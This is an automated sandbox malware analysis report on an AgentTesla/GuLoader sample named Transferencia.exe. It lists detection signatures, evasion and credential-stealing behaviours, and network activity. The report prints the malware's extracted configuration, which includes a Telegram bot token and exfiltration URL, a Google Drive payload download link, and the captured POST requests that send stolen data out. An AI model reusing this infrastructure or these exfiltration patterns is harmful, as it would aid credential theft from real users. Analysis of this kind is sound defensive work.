Windows Analysis Report
Transferencia.exe

Overview

General Information

Sample Name: Transferencia.exe
Analysis ID: 624276
MD5: fb1d131568bdd2fa951608534f83a75c
SHA1: ff02df2cb07c221b8ed3583c6dafb8c0e35684f8
SHA256: 42625067621ac2dba6b95e565a48454637f46185356034da214a00a3d453c971
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection

barindex
Source: 00000009.00000000.100478953847.0000000001350000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1hB?$1A"}
Source: Transferencia.exe.6500.2.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5333980955", "Chat URL": "https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument"}
Source: CasPol.exe.4560.9.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendMessage"}
Source: Transferencia.exe ReversingLabs: Detection: 26%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC9220 CryptUnprotectData, 9_2_20DC9220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC9A1F CryptUnprotectData, 9_2_20DC9A1F
Source: Transferencia.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 216.58.212.142:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: Transferencia.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_00406850 FindFirstFileW,FindClose, 2_2_00406850
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_00405C26
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_0040290B FindFirstFileW, 2_2_0040290B

Networking

barindex
Source: unknown DNS query: name: api.telegram.org
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1hB?$1A
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3355f7c6849eHost: api.telegram.orgContent-Length: 1033Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da33572e228161Host: api.telegram.orgContent-Length: 21529Expect: 100-continue
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r562t78j67kq2fi8o6al2mrn8/1652268450000/12299294031038466182/*/1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1o-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000009.00000002.105255896038.000000001DBBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 00000009.00000002.105256772800.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100760335724.0000000020B01000.00000004.00000800.00020000.00000000.sdmp, Cookies.9.dr String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.9.dr String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://EawggF.com
Source: CasPol.exe, 00000009.00000002.105256553167.000000001DC2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105257172459.000000001DCA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100614361859.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100614361859.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000009.00000002.105256389496.000000001DC15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nRQMtDNYU5cYJ.net
Source: Transferencia.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%t-
Source: CasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105257088442.000000001DC88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: CasPol.exe, 00000009.00000002.105256438921.000000001DC1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument
Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocumentdocument-----
Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: CasPol.exe, 00000009.00000002.105232595181.000000000157C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-04-1o-docs.googleusercontent.com/
Source: CasPol.exe, 00000009.00000003.100609667357.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100614274320.0000000001593000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.100610154370.000000000159D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232709028.0000000001586000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-04-1o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r
Source: CasPol.exe, 00000009.00000002.105231609654.0000000001500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000009.00000002.105232101362.0000000001546000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv
Source: CasPol.exe, 00000009.00000002.105232101362.0000000001546000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv(
Source: CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000009.00000002.105261137084.000000001E042000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000009.00000002.105261137084.000000001E042000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000009.00000002.105261137084.000000001E042000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000009.00000002.105255313107.000000001DB43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown HTTP traffic detected: POST /bot5288820614:AAG-hyM7vecg27FJtsAvcRgnrHDk77cGPCc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3355f7c6849eHost: api.telegram.orgContent-Length: 1033Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v0f0106r562t78j67kq2fi8o6al2mrn8/1652268450000/12299294031038466182/*/1hBPij_FbvgapJ-GfS2ATEfZikBmSe_Fv?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1o-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 216.58.212.142:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 2_2_004056BB
Source: Transferencia.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040350A
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_700D1BFF 2_2_700D1BFF
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF4AA5 2_2_02FF4AA5
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF7038 2_2_02FF7038
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE5D23 2_2_02FE5D23
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9EE9 2_2_02FE9EE9
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF5AD4 2_2_02FF5AD4
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE92BE 2_2_02FE92BE
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF5EA6 2_2_02FF5EA6
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECC9E 2_2_02FECC9E
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE927C 2_2_02FE927C
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECE76 2_2_02FECE76
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FEA06A 2_2_02FEA06A
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9E60 2_2_02FE9E60
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE4846 2_2_02FE4846
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF763F 2_2_02FF763F
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF5432 2_2_02FF5432
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF402B 2_2_02FF402B
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9E19 2_2_02FE9E19
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE8A0C 2_2_02FE8A0C
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECC09 2_2_02FECC09
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9801 2_2_02FE9801
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF43E5 2_2_02FF43E5
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECDBF 2_2_02FECDBF
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF57B8 2_2_02FF57B8
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9FAE 2_2_02FE9FAE
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECBA6 2_2_02FECBA6
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9382 2_2_02FE9382
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECB76 2_2_02FECB76
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECD37 2_2_02FECD37
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE4D2B 2_2_02FE4D2B
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FEA121 2_2_02FEA121
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FED71E 2_2_02FED71E
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECB01 2_2_02FECB01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_1D8A6B62 9_2_1D8A6B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_1D8AA160 9_2_1D8AA160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_1D8A9890 9_2_1D8A9890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_1D8A9548 9_2_1D8A9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DCE2C8 9_2_20DCE2C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC6248 9_2_20DC6248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC16F8 9_2_20DC16F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC1FD0 9_2_20DC1FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC6A98 9_2_20DC6A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC6A46 9_2_20DC6A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DCA558 9_2_20DCA558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20E45180 9_2_20E45180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20E4A438 9_2_20E4A438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20E40710 9_2_20E40710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 1D8AD148 appears 53 times
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF4AA5 NtAllocateVirtualMemory, 2_2_02FF4AA5
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF7038 NtResumeThread, 2_2_02FF7038
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF6A35 NtProtectVirtualMemory, 2_2_02FF6A35
Source: Transferencia.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\Transferencia.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: Transferencia.exe Static PE information: invalid certificate
Source: Transferencia.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\Transferencia.exe File read: C:\Users\user\Desktop\Transferencia.exe Jump to behavior
Source: Transferencia.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Transferencia.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Transferencia.exe "C:\Users\user\Desktop\Transferencia.exe"
Source: C:\Users\user\Desktop\Transferencia.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Transferencia.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia.exe" Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040350A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File created: C:\Users\user\AppData\Roaming\jbhc2jzl.aup Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe File created: C:\Users\user\AppData\Local\Temp\nsy4B54.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/6@3/3
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_004021AA CoCreateInstance, 2_2_004021AA
Source: C:\Users\user\Desktop\Transferencia.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 2_2_00404967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:304:WilStaging_02
Source: C:\Users\user\Desktop\Transferencia.exe File written: C:\Users\user\AppData\Local\Temp\FJERKRFARMENES.ini Jump to behavior
